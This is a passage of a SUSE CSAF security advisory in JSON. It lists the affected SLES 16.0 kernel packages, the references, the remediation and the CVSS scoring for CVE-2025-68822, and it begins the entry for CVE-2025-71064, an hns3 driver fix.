"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68822",
"url": "https://www.suse.com/security/cve/CVE-2025-68822"
},
{
"category": "external",
"summary": "SUSE Bug 1256668 for CVE-2025-68822",
"url": "https://bugzilla.suse.com/1256668"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68822"
},
{
"cve": "CVE-2025-71064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
